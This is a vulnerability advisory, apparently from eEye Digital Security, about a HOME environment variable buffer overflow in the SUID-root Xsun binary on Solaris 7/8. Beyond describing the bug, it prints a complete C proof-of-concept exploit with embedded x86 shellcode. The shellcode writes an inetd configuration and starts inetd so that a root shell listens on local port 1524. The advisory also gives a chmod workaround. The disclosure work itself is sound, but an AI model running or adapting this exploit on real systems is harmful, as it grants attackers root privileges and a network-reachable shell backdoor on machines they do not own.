|
Vulnerability Xsun Affected Solaris 7/8 (x86 and sparc) Description eEye Digital Security (Riley Hassell) found following. A buffer overflow was discovered in Xsun. Since Xsun is SUID root, exploiting this vulnerability yields root privileges. The overflow exists in Xsun's handling of the HOME environment variable. bash-2.03$ HOME=`perl -e 'print "A"x1050'` bash-2.03$ /usr/openwin/bin/Xsun :1 Warning: There is no XDISPLAY information for display 1. Server is using XDISPLAY information for display 0. Default Font Path: /usr/openwin/lib/X11/ Segmentation Fault (core dumped) Proof of Concept: /***********************************/ Solaris 7 (x86) /usr/openwin/bin/Xsun HOME environment overflow Proof of Concept Exploitation riley@eeye.com Puts a Root shell on local port 1524 /***********************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define BUFLEN 1041 /* seteuid/setuid/inetd shell */ char eyecode[] = "\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e" "\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c" "\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50" "\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46" "\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56" "\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e" "\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2" "\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff" "\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73" "\x68\x20\x2d\x63\x20" "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye;" "/usr/sbin/inetd -s /tmp/eeye2001"; char buf[BUFLEN]; unsigned long int nop, esp; long int offset = 0; unsigned long int get_esp() {__asm__("movl %esp,%eax");} int main (int argc, char *argv[]) { int i; if (argc > 1) offset = strtol(argv[1], NULL, 0); else offset = -200; esp = get_esp(); memset(buf, 0x90, BUFLEN); memcpy(buf+800, eyecode, strlen(eyecode)); *((int *) &buf[1037]) = esp+offset; strncpy(&buf[0],"HOME=",5); putenv(buf); execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL); return; } The correct information is: Solaris 7 and Solaris 8 x86 Xsun is suid Solaris 7 and Solaris 8 Sparc Xsun is sgid Solution Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered. Workaround: chmod -s /usr/openwin/bin/Xsun This will remove the setuid bit from Xsun, therefore if someone does exploit this vulnerability, they won't gain higher privileges. Xsun is set-uid root on Solaris/Intel where it needs it for certain device drivers. Xsun is set-gid sys on Solaris/SPARC. If you run Xsun through dtlogin, you can safely strip the set-uid bits.